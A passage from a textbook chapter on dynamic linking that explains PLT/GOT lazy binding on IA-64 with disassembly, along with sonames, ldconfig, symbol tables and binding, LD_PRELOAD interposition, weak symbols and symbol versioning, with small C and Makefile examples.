synonymous with the fix-up process described above for variables located in the GOT. When an entry has
been "fixed-up" it is said to be "bound" to its real address.
As we mentioned, sometimes a program will include a function from a library but never actually call that
function, depending on user input. The process of binding this function is quite intensive, involving loading
code, searching through tables and writing memory. To go through the process of binding a function that
is not used is simply a waste of time.
Lazy binding defers this expense until the actual function is called by using a PLT.
Each library function has an entry in the PLT, which initially points to some special dummy code. When
the program calls the function, it actually calls the PLT entry (in the same was as variables are referenced
through the GOT).
This dummy function will load a few parameters that need to be passed to the dynamic linker for it to
resolve the function and then call into a special lookup function of the dynamic linker. The dynamic linker
finds the real address of the function, and writes that location into the calling binary over the top of the
dummy function call.
Thus, the next time the function is called the address can be loaded without having to go back into the
dynamic loader again. If a function is never called, then the PLT entry will never be modified but there
will be no runtime overhead.
The PLT in action
Things start to get a bit hairy here! If nothing else, you should begin to appreciate that there is a fair bit
of work in resolving a dynamic symbol!
Let us consider the simple "hello World" application. This will only make one library call to printf to
output the string to the user.
Example 9.8. Hello World PLT example
  1 
                  $ cat hello.c
    #include <stdio.h>
    
  5 int main(void)
    {
            printf("Hello, World!\n");
            return 0;
    }
Dynamic Linking
165 10 
    $ gcc -o hello hello.c
    
    $ readelf --relocs ./hello
    
 15 Relocation section '.rela.dyn' at offset 0x3f0 contains 2 entries:
      Offset          Info           Type           Sym. Value    Sym. Name + Addend
    6000000000000ed8  000700000047 R_IA64_FPTR64LSB  0000000000000000 _Jv_RegisterClasses + 0
    6000000000000ee0  000900000047 R_IA64_FPTR64LSB  0000000000000000 __gmon_start__ + 0
    
 20 Relocation section '.rela.IA_64.pltoff' at offset 0x420 contains 3 entries:
      Offset          Info           Type           Sym. Value    Sym. Name + Addend
    6000000000000f10  000200000081 R_IA64_IPLTLSB    0000000000000000 printf + 0
    6000000000000f20  000800000081 R_IA64_IPLTLSB    0000000000000000 __libc_start_main + 0
    6000000000000f30  000900000081 R_IA64_IPLTLSB    0000000000000000 __gmon_start__ + 0
 25 
                
We can see above that we have a R_IA64_IPLTLSB  relocation for our printf symbol. This is saying
"put the address of symbol printf into memory address 0x6000000000000f10". We have to start digging
deeper to find the exact procedure that gets us the function.
Below we have a look at the disassembly of the main() function of the program.
Example 9.9. Hello world main()
  1 
                  4000000000000790 <main>:
    4000000000000790:       00 08 15 08 80 05       [MII]       alloc r33=ar.pfs,5,4,0
    4000000000000796:       20 02 30 00 42 60                   mov r34=r12
  5 400000000000079c:       04 08 00 84                         mov r35=r1
    40000000000007a0:       01 00 00 00 01 00       [MII]       nop.m 0x0
    40000000000007a6:       00 02 00 62 00 c0                   mov r32=b0
    40000000000007ac:       81 0c 00 90                         addl r14=72,r1;;
    40000000000007b0:       1c 20 01 1c 18 10       [MFB]       ld8 r36=[r14]
 10 40000000000007b6:       00 00 00 02 00 00                   nop.f 0x0
    40000000000007bc:       78 fd ff 58                         br.call.sptk.many b0=4000000000000520 <_init+0xb0>
    40000000000007c0:       02 08 00 46 00 21       [MII]       mov r1=r35
    40000000000007c6:       e0 00 00 00 42 00                   mov r14=r0;;
    40000000000007cc:       01 70 00 84                         mov r8=r14
 15 40000000000007d0:       00 00 00 00 01 00       [MII]       nop.m 0x0
    40000000000007d6:       00 08 01 55 00 00                   mov.i ar.pfs=r33
    40000000000007dc:       00 0a 00 07                         mov b0=r32
    40000000000007e0:       1d 60 00 44 00 21       [MFB]       mov r12=r34
    40000000000007e6:       00 00 00 02 00 80                   nop.f 0x0
 20 40000000000007ec:       08 00 84 00                         br.ret.sptk.many b0;;
    
                
The call to 0x4000000000000520 must be us calling the printf function. We can find out where this
is by looking at the sections with readelf .
Example 9.10. Hello world sections
  1 
Dynamic Linking
166                  $ readelf --sections ./hello
    There are 40 section headers, starting at offset 0x25c0:
    
  5 Section Headers:
      [Nr] Name              Type             Address           Offset
           Size              EntSize          Flags  Link  Info  Align
      [ 0]                   NULL             0000000000000000  00000000
           0000000000000000  0000000000000000           0     0     0
 10 ...
      [11] .plt              PROGBITS         40000000000004c0  000004c0
           00000000000000c0  0000000000000000  AX       0     0     32
      [12] .text             PROGBITS         4000000000000580  00000580
           00000000000004a0  0000000000000000  AX       0     0     32
 15   [13] .fini             PROGBITS         4000000000000a20  00000a20
           0000000000000040  0000000000000000  AX       0     0     16
      [14] .rodata           PROGBITS         4000000000000a60  00000a60
           000000000000000f  0000000000000000   A       0     0     8
      [15] .opd              PROGBITS         4000000000000a70  00000a70
 20        0000000000000070  0000000000000000   A       0     0     16
      [16] .IA_64.unwind_inf PROGBITS         4000000000000ae0  00000ae0
           00000000000000f0  0000000000000000   A       0     0     8
      [17] .IA_64.unwind     IA_64_UNWIND     4000000000000bd0  00000bd0
           00000000000000c0  0000000000000000  AL      12     c     8
 25   [18] .init_array       INIT_ARRAY       6000000000000c90  00000c90
           0000000000000018  0000000000000000  WA       0     0     8
      [19] .fini_array       FINI_ARRAY       6000000000000ca8  00000ca8
           0000000000000008  0000000000000000  WA       0     0     8
      [20] .data             PROGBITS         6000000000000cb0  00000cb0
 30        0000000000000004  0000000000000000  WA       0     0     4
      [21] .dynamic          DYNAMIC          6000000000000cb8  00000cb8
           00000000000001e0  0000000000000010  WA       5     0     8
      [22] .ctors            PROGBITS         6000000000000e98  00000e98
           0000000000000010  0000000000000000  WA       0     0     8
 35   [23] .dtors            PROGBITS         6000000000000ea8  00000ea8
           0000000000000010  0000000000000000  WA       0     0     8
      [24] .jcr              PROGBITS         6000000000000eb8  00000eb8
           0000000000000008  0000000000000000  WA       0     0     8
      [25] .got              PROGBITS         6000000000000ec0  00000ec0
 40        0000000000000050  0000000000000000 WAp       0     0     8
      [26] .IA_64.pltoff     PROGBITS         6000000000000f10  00000f10
           0000000000000030  0000000000000000 WAp       0     0     16
      [27] .sdata            PROGBITS         6000000000000f40  00000f40
           0000000000000010  0000000000000000 WAp       0     0     8
 45   [28] .sbss             NOBITS           6000000000000f50  00000f50
           0000000000000008  0000000000000000  WA       0     0     8
      [29] .bss              NOBITS           6000000000000f58  00000f50
           0000000000000008  0000000000000000  WA       0     0     8
      [30] .comment          PROGBITS         0000000000000000  00000f50
 50        00000000000000b9  0000000000000000           0     0     1
      [31] .debug_aranges    PROGBITS         0000000000000000  00001010
           0000000000000090  0000000000000000           0     0     16
      [32] .debug_pubnames   PROGBITS         0000000000000000  000010a0
           0000000000000025  0000000000000000           0     0     1
 55   [33] .debug_info       PROGBITS         0000000000000000  000010c5
Dynamic Linking
167           00000000000009c4  0000000000000000           0     0     1
      [34] .debug_abbrev     PROGBITS         0000000000000000  00001a89
           0000000000000124  0000000000000000           0     0     1
      [35] .debug_line       PROGBITS         0000000000000000  00001bad
 60        00000000000001fe  0000000000000000           0     0     1
      [36] .debug_str        PROGBITS         0000000000000000  00001dab
           00000000000006a1  0000000000000001  MS       0     0     1
      [37] .shstrtab         STRTAB           0000000000000000  0000244c
           000000000000016f  0000000000000000           0     0     1
 65   [38] .symtab           SYMTAB           0000000000000000  00002fc0
           0000000000000b58  0000000000000018          39    60     8
      [39] .strtab           STRTAB           0000000000000000  00003b18
           0000000000000479  0000000000000000           0     0     1
    Key to Flags:
 70   W (write), A (alloc), X (execute), M (merge), S (strings)
      I (info), L (link order), G (group), x (unknown)
      O (extra OS processing required) o (OS specific), p (processor specific)
    
                
That address is (unsurprisingly) in the .plt section. So there we have our call into the PLT! But we're
not satisfied with that, let's keep digging further to see what we can uncover. We disassemble the .plt
section to see what that call actually does.
Example 9.11. Hello world PLT
  1 
                  40000000000004c0 <.plt>:
    40000000000004c0:       0b 10 00 1c 00 21       [MMI]       mov r2=r14;;
    40000000000004c6:       e0 00 08 00 48 00                   addl r14=0,r2
  5 40000000000004cc:       00 00 04 00                         nop.i 0x0;;
    40000000000004d0:       0b 80 20 1c 18 14       [MMI]       ld8 r16=[r14],8;;
    40000000000004d6:       10 41 38 30 28 00                   ld8 r17=[r14],8
    40000000000004dc:       00 00 04 00                         nop.i 0x0;;
    40000000000004e0:       11 08 00 1c 18 10       [MIB]       ld8 r1=[r14]
 10 40000000000004e6:       60 88 04 80 03 00                   mov b6=r17
    40000000000004ec:       60 00 80 00                         br.few b6;;
    40000000000004f0:       11 78 00 00 00 24       [MIB]       mov r15=0
    40000000000004f6:       00 00 00 02 00 00                   nop.i 0x0
    40000000000004fc:       d0 ff ff 48                         br.few 40000000000004c0 <_init+0x50>;;
 15 4000000000000500:       11 78 04 00 00 24       [MIB]       mov r15=1
    4000000000000506:       00 00 00 02 00 00                   nop.i 0x0
    400000000000050c:       c0 ff ff 48                         br.few 40000000000004c0 <_init+0x50>;;
    4000000000000510:       11 78 08 00 00 24       [MIB]       mov r15=2
    4000000000000516:       00 00 00 02 00 00                   nop.i 0x0
 20 400000000000051c:       b0 ff ff 48                         br.few 40000000000004c0 <_init+0x50>;;
    4000000000000520:       0b 78 40 03 00 24       [MMI]       addl r15=80,r1;;
    4000000000000526:       00 41 3c 70 29 c0                   ld8.acq r16=[r15],8
    400000000000052c:       01 08 00 84                         mov r14=r1;;
    4000000000000530:       11 08 00 1e 18 10       [MIB]       ld8 r1=[r15]
 25 4000000000000536:       60 80 04 80 03 00                   mov b6=r16
    400000000000053c:       60 00 80 00                         br.few b6;;
    4000000000000540:       0b 78 80 03 00 24       [MMI]       addl r15=96,r1;;
    4000000000000546:       00 41 3c 70 29 c0                   ld8.acq r16=[r15],8
Dynamic Linking
168    400000000000054c:       01 08 00 84                         mov r14=r1;;
 30 4000000000000550:       11 08 00 1e 18 10       [MIB]       ld8 r1=[r15]
    4000000000000556:       60 80 04 80 03 00                   mov b6=r16
    400000000000055c:       60 00 80 00                         br.few b6;;
    4000000000000560:       0b 78 c0 03 00 24       [MMI]       addl r15=112,r1;;
    4000000000000566:       00 41 3c 70 29 c0                   ld8.acq r16=[r15],8
 35 400000000000056c:       01 08 00 84                         mov r14=r1;;
    4000000000000570:       11 08 00 1e 18 10       [MIB]       ld8 r1=[r15]
    4000000000000576:       60 80 04 80 03 00                   mov b6=r16
    400000000000057c:       60 00 80 00                         br.few b6;;
    
 40             
Let us step through the instructions. Firstly, we add 80 to the value in r1, storing it in r15. We know from
before that r1 will be pointing to the GOT, so this is saying "store in r15 80 bytes into the GOT". The next
thing we do is load into r16 the value stored in this location in the GOT, and post increment the value in
r15 by 8 bytes. We then store r1 (the location of the GOT) in r14 and set r1 to be the value in the next 8
bytes after r15. Then we branch to r16.
In the previous chapter we discussed how functions are actually called through a function descriptor which
contains the function address and the address of the global pointer. Here we can see that the PLT entry is
first loading the function value, moving on 8 bytes to the second part of the function descriptor and then
loading that value into the gp register before calling the function.
But what exactly are we loading? We know that r1 will be pointing to the GOT. We go 80 bytes past
the got (0x50)
Example 9.12. Hello world GOT
  1 
                  $ objdump --disassemble-all ./hello 
    Disassembly of section .got:
    
  5 6000000000000ec0 <.got>:
            ...
    6000000000000ee8:       80 0a 00 00 00 00                   data8 0x02a000000
    6000000000000eee:       00 40 90 0a                         dep r0=r0,r0,63,1
    6000000000000ef2:       00 00 00 00 00 40       [MIB] (p20) break.m 0x1
 10 6000000000000ef8:       a0 0a 00 00 00 00                   data8 0x02a810000
    6000000000000efe:       00 40 50 0f                         br.few 6000000000000ef0 <_GLOBAL_OFFSET_TABLE_+0x30>
    6000000000000f02:       00 00 00 00 00 60       [MIB] (p58) break.m 0x1
    6000000000000f08:       60 0a 00 00 00 00                   data8 0x029818000
    6000000000000f0e:       00 40 90 06                         br.few 6000000000000f00 <_GLOBAL_OFFSET_TABLE_+0x40>
 15 Disassembly of section .IA_64.pltoff:
    
    6000000000000f10 <.IA_64.pltoff>:
    6000000000000f10:       f0 04 00 00 00 00       [MIB] (p39) break.m 0x0
    6000000000000f16:       00 40 c0 0e 00 00                   data8 0x03b010000
 20 6000000000000f1c:       00 00 00 60                         data8 0xc000000000
    6000000000000f20:       00 05 00 00 00 00       [MII] (p40) break.m 0x0
    6000000000000f26:       00 40 c0 0e 00 00                   data8 0x03b010000
    6000000000000f2c:       00 00 00 60                         data8 0xc000000000
    6000000000000f30:       10 05 00 00 00 00       [MIB] (p40) break.m 0x0
 25 6000000000000f36:       00 40 c0 0e 00 00                   data8 0x03b010000
    6000000000000f3c:       00 00 00 60                         data8 0xc000000000
Dynamic Linking
169    
                
0x6000000000000ec0 + 0x50 = 0x6000000000000f10, or the .IA_64.pltoff  section. Now we're
starting to get somewhere!
We can decode the objdump output so we can see exactly what is being loaded here. Swapping the byte
order of the first 8 bytes f0 04 00 00 00 00 00 40  we end up with 0x4000000000004f0 .
Now that address looks familiar! Looking back up at the assemble output of the PLT we see that address.
The code at 0x4000000000004f0  firstly puts a zero value into r15, and then branches back to
0x40000000000004c0 . Wait a minute! That's the start of our PLT section.
We can trace this code through too. Firstly we save the value of the global pointer ( r2) then we load three
8 byte values into r16, r17 and finally, r1. We then branch to the address in r17. What we are seeing
here is the actual call into the dynamic linker!
We need to delve into the ABI to understand exactly what is being loaded at this point. The
ABI says two things -- dynamically linked programs must have a special section (called the
DT_IA_64_PLT_RESERVE  section) that can hold three 8 byte values. There is a pointer where this
reserved area in the dynamic segment of the binary.
Example 9.13. Dynamic Segment
  1 
                  
    Dynamic segment at offset 0xcb8 contains 25 entries:
      Tag        Type                         Name/Value
  5  0x0000000000000001 (NEEDED)             Shared library: [libc.so.6.1]
     0x000000000000000c (INIT)               0x4000000000000470
     0x000000000000000d (FINI)               0x4000000000000a20
     0x0000000000000019 (INIT_ARRAY)         0x6000000000000c90
     0x000000000000001b (INIT_ARRAYSZ)       24 (bytes)
 10  0x000000000000001a (FINI_ARRAY)         0x6000000000000ca8
     0x000000000000001c (FINI_ARRAYSZ)       8 (bytes)
     0x0000000000000004 (HASH)               0x4000000000000200
     0x0000000000000005 (STRTAB)             0x4000000000000330
     0x0000000000000006 (SYMTAB)             0x4000000000000240
 15  0x000000000000000a (STRSZ)              138 (bytes)
     0x000000000000000b (SYMENT)             24 (bytes)
     0x0000000000000015 (DEBUG)              0x0
     0x0000000070000000 (IA_64_PLT_RESERVE)  0x6000000000000ec0 -- 0x6000000000000ed8
     0x0000000000000003 (PLTGOT)             0x6000000000000ec0
 20  0x0000000000000002 (PLTRELSZ)           72 (bytes)
     0x0000000000000014 (PLTREL)             RELA
     0x0000000000000017 (JMPREL)             0x4000000000000420
     0x0000000000000007 (RELA)               0x40000000000003f0
     0x0000000000000008 (RELASZ)             48 (bytes)
 25  0x0000000000000009 (RELAENT)            24 (bytes)
     0x000000006ffffffe (VERNEED)            0x40000000000003d0
     0x000000006fffffff (VERNEEDNUM)         1
     0x000000006ffffff0 (VERSYM)             0x40000000000003ba
     0x0000000000000000 (NULL)               0x0
 30 
                
Dynamic Linking
170Do you notice anything about it? It's the same value as the GOT. This means that the first three 8 byte
entries in the GOT are actually the reserved area; thus will always be pointed to by the global pointer.
When the dynamic linker starts it is its duty to fill these values in. The ABI says that the first value will be
filled in by the dynamic linker giving this module a unique ID. The second value is the global pointer value
for the dynamic linker, and the third value is the address of the function that finds and fixes up the symbol.
Example 9.14. Code in the dynamic linker for setting up special values (from libc
sysdeps/ia64/dl-machine.h )
  1 
                  /* Set up the loaded object described by L so its unrelocated PLT
       entries will jump to the on-demand fixup code in dl-runtime.c.  */
    
  5 static inline int __attribute__ ((unused, always_inline))
    elf_machine_runtime_setup (struct link_map *l, int lazy, int profile)
    {
      extern void _dl_runtime_resolve (void);
      extern void _dl_runtime_profile (void);
 10 
      if (lazy)
        {
          register Elf64_Addr gp __asm__ ("gp");
          Elf64_Addr *reserve, doit;
 15 
          /*
           * Careful with the typecast here or it will try to add l-l_addr
           * pointer elements
           */
 20       reserve = ((Elf64_Addr *)
                     (l->l_info[DT_IA_64 (PLT_RESERVE)]->d_un.d_ptr + l->l_addr));
          /* Identify this shared object.  */
          reserve[0] = (Elf64_Addr) l;
    
 25       /* This function will be called to perform the relocation.  */
          if (!profile)
            doit = (Elf64_Addr) ((struct fdesc *) &_dl_runtime_resolve)->ip;
          else
            {
 30           if (GLRO(dl_profile) != NULL
                  && _dl_name_match_p (GLRO(dl_profile), l))
                {
                  /* This is the object we are looking for.  Say that we really
                     want profiling and the timers are started.  */
 35               GL(dl_profile_map) = l;
                }
              doit = (Elf64_Addr) ((struct fdesc *) &_dl_runtime_profile)->ip;
            }
    
 40       reserve[1] = doit;
          reserve[2] = gp;
        }
    
      return lazy;
Dynamic Linking
171 45 }
    
                
We can see how this gets setup by the dynamic linker by looking at the function that does this for the
binary. The reserve  variable is set from the PLT_RESERVE section pointer in the binary. The unique
value (put into reserve[0] ) is the address of the link map for this object. Link maps are the internal
representation within glibc for shared objects. We then put in the address of _dl_runtime_resolve
to the second value (assuming we are not using profiling). reserve[2]  is finally set to gp, which has
been found from r2 with the __asm__  call.
Looking back at the ABI, we see that the relocation index  for the entry must be placed in r15 and
the unique identifier must be passed in r16.
r15 has previously been set in the stub code, before we jumped back to the start of the PLT. Have a look
down the entries, and notice how each PLT entry loads r15 with an incremented value? It should come
as no surprise if you look at the relocations the printf relocation is number zero.
r16 we load up from the values that have been initialised by the dynamic linker, as previously discussed.
Once that is ready, we can load the function address and global pointer and branch into the function.
What happens at this point is the dynamic linker function _dl_runtime_resolve  is run. It finds the
relocation; remember how the relocation specified the name of the symbol? It uses this name to find the
right function; this might involve loading the library from disk if it is not already in memory, or otherwise
sharing the code.
The relocation record provides the dynamic linker with the address it needs to "fix up"; remember it was in
the GOT and loaded by the initial PLT stub? This means that after the first time the function is called, the
second time it is loaded it will get the direct address of the function; short circuiting the dynamic linker.
Summary
You've seen the exact mechanism behind the PLT, and consequently the inner workings of the dynamic
linker. The important points to remember are
•Library calls in your program actually call a stub of code in the PLT of the binary.
•That stub code loads an address and jumps to it.
•Initially, that address points to a function in the dynamic linker which is capable of looking up the "real"
function, given the information in the relocation entry for that function.
•The dynamic linker re-writes the address that the stub code reads, so that the next time the function is
called it will go straight to the right address.
Working with libraries and the linker
The presence of the dynamic linker provides both some advantages we can utilise and some extra issues
that need to be resolved to get a functional system.
Library versions
One potential issue is different versions of libraries. With only static libraries there is much less potential
for problems, as all library code is built directly into the binary of the application. If you want to use a new
version of the library you need to recompile it into a new binary, replacing the old one.
Dynamic Linking
172This is obviously fairly impractical for common libraries, the most common of course being libc which
is included in most all applications. If it were only available as a static library any change would require
every single application in the system be rebuilt.
However, changes in the way the dynamic library work could cause multiple problems. In the best case, the
modifications are completely compatible and nothing externally visible is changed. On the other hand the
changes might cause the application to crash; for example if a function that used to take an int changes to
take an int *. Worse, the new library version could have changed semantics and suddenly start silently
returning different, possibly wrong values. This can be a very nasty bug to try and track down; when an
application crashes you can use a debugger to isolate where the error occurs whilst data corruption or
modification may only show up in seemingly unrelated parts of the application.
The dynamic linker requires a way to determine the version of libraries within the system so that newer
revisions can be identified. There are a number of schemes a modern dynamic linker can use to find the
right versions of libraries.
sonames
Using sonames  we can add some extra information to a library to help identify versions.
As we have seen previously, an application lists the libraries it requires in DT_NEEDED  fields in the
dynamic section of the binary. The actual library is held in a file on disc, usually in /lib for core system
libraries or /usr/lib  for optional libraries.
To allow multiple versions of the library to exist on disk, they obviously require differing file names. The
soname scheme uses a combination of names and file system links to build a hierarchy of libraries.
This is done by introducing the concept of major and minor library revisions. A minor revision is one
wholly backwards compatible with a previous version of the library; this usually consists of only bug fixes.
A major revision is therefore any revision that is not compatible; e.g. changes the inputs to functions or
the way a function behaves.
As each library revision, major or minor, will need to be kept in a separate file on disk, this forms the basis
of the library hierarchy. The library name is by convention libNAME.so.MAJOR.MINOR2. However, if
every application were directly linked against this file we would have the same issue as with a static library;
every time a minor change happened we would need to rebuild the application to point to the new library.
What we really want to refer to is the major number of the library. If this changes, we reasonably are
required to recompile our application, since we need to make sure our program is still compatible with
the new library.
Thus the soname is the libNAME.so.MAJOR . The soname should be set in the DT_SONAME  field
of the dynamic section in a shared library; the library author can specify this version when they build the
library.
Thus each minor version library file on disc can specify the same major version number in it's DT_SONAME
field, allowing the dynamic linker to know that this particular library file implements a particular major
revision of the library API and ABI.
To keep track of this, an application called ldconfig is commonly run to create symbolic links named for
the major version to the latest minor version on the system. ldconfig works by running through all the
libraries that implement a particular major revision number, and then picks out the one with the highest
minor revision. It then creates a symbolic link from libNAME.so.MAJOR  to the actual library file on
disc, i.e. libNAME.so.MAJOR.MINOR .
2You can optionally have a release as a final identifier after the minor number. Generally this is enough to distinguish all the various versions library.
Dynamic Linking
173XXX : talk about libtool versions
The final piece of the hierarchy is the compile name  for the library. When you compile your program, to
link against a library you use the -lNAME flag, which goes off searching for the libNAME.so  file in the
library search path. Notice however, we have not specified any version number; we just want to link against
the latest library on the system. It is up to the installation procedure for the library to create the symbolic
link between the compile libNAME.so  name and the latest library code on the system. Usually this is
handled by your package management system (dpkg or rpm). This is not an automated process because it
is possible that the latest library on the system may not be the one you wish to always compile against; for
example if the latest installed library were a development version not appropriate for general use.
The general process is illustrated below.
Figure 9.2. sonames
Major Revision 2
libfoo.so.2libfoo.so.2.0
Minor Revision 0
Major Revision 1
libfoo.so.1libfoo.so.1.2
Minor Revision 2
Major Revision 1
libfoo.so.1libfoo.so.1.1
Minor Revision 1
DT_NEEDED
libfoo.so.1/usr/lib/libfoo.so.2
/usr/lib/usr/lib/libfoo.so$ gcc -o test test.c -lfoo
Newer revisions
File Name
sonameOld ApplicationNew Build
How the dynamic linker looks up libraries
When the application starts, the dynamic linker looks at the DT_NEEDED  field to find the required libraries.
This field contains the soname of the library, so the next step is for the dynamic linker to walk through
all the libraries in its search path looking for it.
Dynamic Linking
174This process conceptually involves two steps. Firstly the dynamic linker needs to search through all the
libraries to find those that implement the given soname. Secondly the file names for the minor revisions
need to be compared to find the latest version, which is then ready to be loaded.
We mentioned previously that there is a symbolic link setup by ldconfig between the library soname and
the latest minor revision. Thus the dynamic linker should need to only follow that link to find the correct
file to load, rather than having to open all possible libraries and decide which one to go with each time
the application is required.
Since file system access is so slow, ldconfig also creates a cache of libraries installed in the system.
This cache is simply a list of sonames of libraries available to the dynamic linker and a pointer to the
major version link on disk, saving the dynamic linker having to read entire directories full of files to
locate the correct link. You can analyse this with /sbin/ldconfig -p; it actually lives in the file /etc/
ldconfig.so.cache . If the library is not found in the cache the dynamic linker will fall back to the
slower option of walking the file system, thus it is important to re-run ldconfig when new libraries are
installed.
Finding symbols
We've already discussed how the dynamic linker gets the address of a library function and puts it in the
PLT for the program to use. But so far we haven't discussed just how the dynamic linker finds the address
of the function. The whole process is called binding, because the symbol name is bound to the address
it represents.
The dynamic linker has a few pieces of information; firstly the symbol that it is searching for, and secondly
a list of libraries that that symbol might be in, as defined by the DT_NEEDED  fields in the binary.
Each shared object library has a section, marked SHT_DYNSYM  and called .dynsym  which is the minimal
set of symbols required for dynamic linking -- that is any symbol in the library that may be called by an
external program.
Dynamic Symbol Table
In fact, there are three sections that all play a part in describing the dynamic symbols. Firstly, let us look
at the definition of a symbol from the ELF specification
Example 9.15. Symbol definition from ELF
  1 
                  typedef struct {
              Elf32_Word    st_name;
              Elf32_Addr    st_value;
  5           Elf32_Word    st_size;
              unsigned char st_info;
              unsigned char st_other;
              Elf32_Half    st_shndx;
    } Elf32_Sym;
 10 
                
Table 9.2. ELF symbol fields
Field Value
st_name An index to the string table
Dynamic Linking
175Field Value
st_value Value - in a relocatable shared object this holds the
offset from the section of index given in st_shndx
st_size Any associated size of the symbol
st_info Information on the binding of the symbol (described
below) and what type of symbol this is (a function,
object, etc).
st_other Not currently used
st_shndx Index of the section this symbol resides in (see
st_value
As you can see, the actual string of the symbol name is held in a separate section ( .dynstr ; the entry in
the .dynsym  section only holds an index into the string section. This creates some level of overhead for
the dynamic linker; the dynamic linker must read all of the symbol entries in the .dynsym  section and
then follow the index pointer to find the symbol name for comparison.
To speed this process up, a third section called .hash is introduced, containing a hash table  of symbol
names to symbol table entries. This hash table is pre-computed when the library is built and allows the
dynamic linker to find the symbol entry much faster, generally with only one or two lookups.
Symbol Binding
Whilst we usually say the process of finding the address of a symbol refers is the process of binding that
symbol, the symbol binding  has a separate meaning.
The binding of a symbol dictates its external visibility during the dynamic linking process. A local symbol
is not visible outside the object file it is defined in. A global symbol is visible to other object files, and
can satisfy undefined references in other objects.
A weak reference is a special type of lower priority global reference. This means it is designed to be
overridden, as we will see shortly.
Below we have an example C program which we analyse to inspect the symbol bindings.
Example 9.16. Examples of symbol bindings
  1 
                  $ cat test.c
    static int static_variable;
    
  5 extern int extern_variable;
    
    int external_function(void);
    
    int function(void)
 10 {
            return external_function();
    }
    
    static int static_function(void)
 15 {
            return 10;
Dynamic Linking
176    }
    
    #pragma weak weak_function
 20 int weak_function(void)
    {
            return 10;
    }
    
 25 $ gcc -c test.c
    $ objdump --syms test.o
    
    test.o:     file format elf32-powerpc
    
 30 SYMBOL TABLE:
    00000000 l    df *ABS*  00000000 test.c
    00000000 l    d  .text  00000000 .text
    00000000 l    d  .data  00000000 .data
    00000000 l    d  .bss   00000000 .bss
 35 00000038 l     F .text  00000024 static_function
    00000000 l    d  .sbss  00000000 .sbss
    00000000 l     O .sbss  00000004 static_variable
    00000000 l    d  .note.GNU-stack        00000000 .note.GNU-stack
    00000000 l    d  .comment       00000000 .comment
 40 00000000 g     F .text  00000038 function
    00000000         *UND*  00000000 external_function
    0000005c  w    F .text  00000024 weak_function
    
    $ nm test.o
 45          U external_function
    00000000 T function
    00000038 t static_function
    00000000 s static_variable
    0000005c W weak_function
 50 
    
                
Notice the use of #pragma  to define the weak symbol. A pragma is a way of communicating extra
information to the compiler; its use is not common but occasionally is required to get the compiler to do
out of the ordinary operations.x
We inspect the symbols with two different tools; in both cases the binding is shown in the second column;
the codes should be quite straight forward (are are documented in the tools man page).
Overriding symbols
It is often very useful for a programmer to be able to override a symbol in a library; that is to subvert the
normal symbol with a different definition.
We mentioned that the order that libraries is searched is given by the order of the DT_NEEDED  fields
within the library. However, it is possible to insert libraries as the last libraries to be searched; this means
that any symbols within them will be found as the final reference.
This is done via an environment variable called LD_PRELOAD  which specifies libraries that the linker
should load last.
Dynamic Linking
177Example 9.17. Example of LD_PRELOAD
  1 
                  $ cat override.c
    #define _GNU_SOURCE 1
    #include <stdio.h>
  5 #include <stdlib.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <dlfcn.h>
    
 10 pid_t getpid(void)
    {
            pid_t (*orig_getpid)(void) = dlsym(RTLD_NEXT, "getpid");
            printf("Calling GETPID\n");
    
 15         return orig_getpid();
    }
    
    $ cat test.c
    #include <stdio.h>
 20 #include <stdlib.h>
    #include <unistd.h>
    
    int main(void)
    {
 25         printf("%d\n", getpid());
    }
    
    $ gcc -shared -fPIC -o liboverride.so override.c -ldl
    $ gcc -o test test.c
 30 $ LD_PRELOAD=./liboverride.so ./test
    Calling GETPID
    15187
                
In the above example we override the getpid function to print out a small statement when it is called.
We use the dlysm function provided by libc with an argument telling it to continue on and find the
next symbol called getpid.
Weak symbols over time
The concept of the weak symbol is that the symbol is marked as a lower priority and can be overridden by
another symbol. Only if no other implementation is found will the weak symbol be the one that it used.
The logical extension of this for the dynamic loader is that all libraries should be loaded, and any weak
symbols in those libraries should be ignored for normal symbols in any other library. This was indeed how
weak symbol handling was originally implemented in Linux by glibc.
However, this was actually incorrect to the letter of the Unix standard at the time ( SysVr4). The standard
actually dictates that weak symbols should only be handled by the static linker; they should remain
irrelevant to the dynamic linker (see the section on binding order below).
At the time, the Linux implementation of making the dynamic linker override weak symbols matched with
SGI's IRIX platform, but differed to others such as Solaris and AIX. When the developers realised this
Dynamic Linking
178behaviour violated the standard it was reversed, and the old behaviour relegated to requiring a special
environment flag ( LD_DYNAMIC_WEAK ) be set.
Specifying binding order
We have seen how we can override a function in another library by preloading  another shared library with
the same symbol defined. The symbol that gets resolved as the final one is the last one in the order that
the dynamic loader loads the libraries.
Libraries are loaded in the order they are specified in the DT_NEEDED  flag of the binary. This in turn is
decided from the order that libraries are passed in on the command line when the object is built. When
symbols are to be located, the dynamic linker starts at the last loaded library and works backwards until
the symbol is found.
Some shared libraries, however, need a way to override this behaviour. They need to say to the dynamic
linker "look first inside me for these symbols, rather than working backwards from the last loaded library".
Libraries can set the DT_SYMBOLIC  flag in their dynamic section header to get this behaviour (this is
usually set by passing the -Bsymbolic  flag on the static linkers command line when building the shared
library).
What this flag is doing is controlling symbol visibility . The symbols in the library can not be overridden
so could be considered private to the library that is being loaded.
However, this loses a lot of granularity since the library is either flagged for this behaviour, or it is not. A
better system would allow us to make some symbols private and some symbols public.
Symbol Versioning
That better system comes from symbol versioning. With symbol versioning we specify some extra input
to the static linker to give it some more information about the symbols in our shared library.
Example 9.18. Example of symbol versioning
  1 
                  $ cat Makefile
    all: test testsym
    
  5 clean:
            rm -f *.so test testsym
    
    liboverride.so : override.c
            $(CC) -shared -fPIC -o liboverride.so override.c
 10 
    libtest.so : libtest.c
            $(CC) -shared -fPIC -o libtest.so libtest.c
    
    libtestsym.so : libtest.c
 15         $(CC) -shared -fPIC -Wl,-Bsymbolic -o libtestsym.so libtest.c
    
    test : test.c libtest.so liboverride.so
            $(CC) -L. -ltest -o test test.c
    
 20 testsym : test.c libtestsym.so liboverride.so
            $(CC) -L. -ltestsym -o testsym test.c
Dynamic Linking
179    
    $ cat libtest.c
    #include <stdio.h>
 25 
    int foo(void) {
            printf("libtest foo called\n");
            return 1;
    }
 30 
    int test_foo(void)
    {
            return foo();
    }
 35 
    $ cat override.c
    #include <stdio.h>
    
    int foo(void)
 40 {
            printf("override foo called\n");
            return 0;
    }
    
 45 $ cat test.c
    #include <stdio.h>
    
    int main(void)
    {
 50         printf("%d\n", test_foo());
    }
    
    $ cat Versions
    {global: test_foo;  local: *; };
 55 
    $ gcc -shared -fPIC -Wl,-version-script=Versions -o libtestver.so libtest.c
    
